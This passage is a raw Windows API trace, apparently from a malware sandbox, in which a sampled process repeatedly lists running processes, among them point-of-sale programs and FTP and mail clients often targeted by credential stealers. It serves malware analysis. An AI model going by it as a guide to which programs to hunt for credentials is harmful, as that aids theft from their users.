cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0201.832] Process32Next (in: hSnapshot=0x20b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0201.834] Process32Next (in: hSnapshot=0x20b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0201.836] Process32Next (in: hSnapshot=0x20b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0201.839] Process32Next (in: hSnapshot=0x20b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0201.844] Process32Next (in: hSnapshot=0x20b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0201.847] Process32Next (in: hSnapshot=0x20b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0201.850] Process32Next (in: hSnapshot=0x20b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0201.853] Process32Next (in: hSnapshot=0x20b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0201.855] Process32Next (in: hSnapshot=0x20b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 0 [0201.859] CloseHandle (hObject=0x20b8) returned 1 [0201.859] Sleep (dwMilliseconds=0x64) [0201.962] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x14a0 [0201.990] Process32First (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0201.994] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0201.996] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0201.999] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0202.001] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0202.003] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0202.019] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0202.021] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0202.022] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0202.024] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0202.026] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0202.027] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0202.029] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0202.030] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0202.032] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0202.034] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0202.035] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0202.045] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0202.047] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0202.049] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0202.050] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0202.052] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0202.082] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0202.086] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0202.088] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0202.090] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0202.125] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0202.126] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0202.128] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0202.129] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0202.131] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0202.134] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0202.136] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0202.138] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0202.140] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0202.141] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0202.144] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0202.145] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0202.147] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0202.148] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0202.150] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0202.152] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0202.157] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0202.160] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0202.163] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0202.203] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0202.205] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0202.207] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0202.209] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0202.211] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0202.213] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0202.214] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0202.216] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0202.219] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0202.220] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0202.222] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0202.224] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0202.226] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0202.228] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0202.230] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0202.233] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0202.235] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0202.297] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0202.301] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0202.304] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0202.309] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0202.313] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0202.316] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0202.319] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0202.322] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0202.330] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0202.334] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0202.383] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0202.387] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0202.390] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: 